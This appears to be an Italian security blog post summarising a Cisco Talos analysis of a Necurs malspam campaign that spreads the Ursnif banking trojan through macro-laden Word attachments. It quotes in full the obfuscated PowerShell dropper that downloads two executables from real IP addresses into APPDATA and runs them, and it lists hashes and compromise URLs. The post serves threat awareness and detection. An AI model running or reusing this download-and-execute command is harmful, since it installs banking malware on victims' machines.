Il Team di Cisco Talos ha condiviso l’analisi della nuova ondata Malspam della Botnet Necurs (link).

Quest’ultima è sicuramente fra le botnet più attive al mondo, in grado di generare enormi quantità di Spam. Le mail malevole inviate contengono Ransomware e Trojan Bancari (Ursnif, Panda Banker o Emotet).

L’apertura del documento malevolo e la conseguente abilitazione del contenuto (abilitazione della Macro), avvia il processo di compromissione del sistema.

Di seguito una breve analisi del Malware bancario Ursnif:


L’allegato malevolo risulta essere un file doc dal nome: [NOMEAZIENDA]_Richiesta – [Cognome dipendente].doc

L’apertura del file e l’abilitazione dei contenuti permette  l’avvio del codice malevolo, in particolare è avviato un comando Powershell con i parametri:

$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=”));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + ‘\valabyhuh.exe’); Start-Process $env:APPDATA’\valabyhuh.exe’;Write-Host “bAbYgiramOpEPY”;$iARAPUmOPaJeS = New-Object System.Net.NetworkCredentia

l(“lUpIaaKAXuqexOGybu”,”lUpIaaKAXuqexOGybu”).SecurePassword;(New-Object System.Net.WebClient).DownloadFile(‘http://91.210.104.247/porn.jpg’, $env:APPDATA + ‘\stat.exe’); Write-Host “FYFopIsYpUjurof”;Start-Process $env:APPDATA’\stat.exe’;$jOCOdeFOLUXALoNA = “nuqoLuSAwEjOdE”,”iiQOCOhERiJYsyie”,”qIhyGAtYlebimycuaUf”,”bYtURYGunUtiKe”,”pazuWeXOQoFIzIQUaUhe”;Exit;

Il codice eseguito avvia il download di 2 file eseguibili:

  • valabyhuh.exe
    • MD5:       fa37eb66b10eb030e777af9420ffce9a
    • SHA1:     92b86fcdb6bc0fcdbb60478e41456d5b565410ce
    • SHA256: 856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69
  • stat.exe
    • MD5:       2ca1f87a624245db0a57bf439b71d460
    • SHA1:     2f6de1b66d8021b74ebcee0040b9a7c00b61d231
    • SHA256: 06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3

Traffico di rete generato:

Indicatori di Compromissione:

  • http:// 91.210.104.247/emotet.txt  (GrandSoft EK related)
  • http:// 45.227.252.241/linnealva/kitea.dlm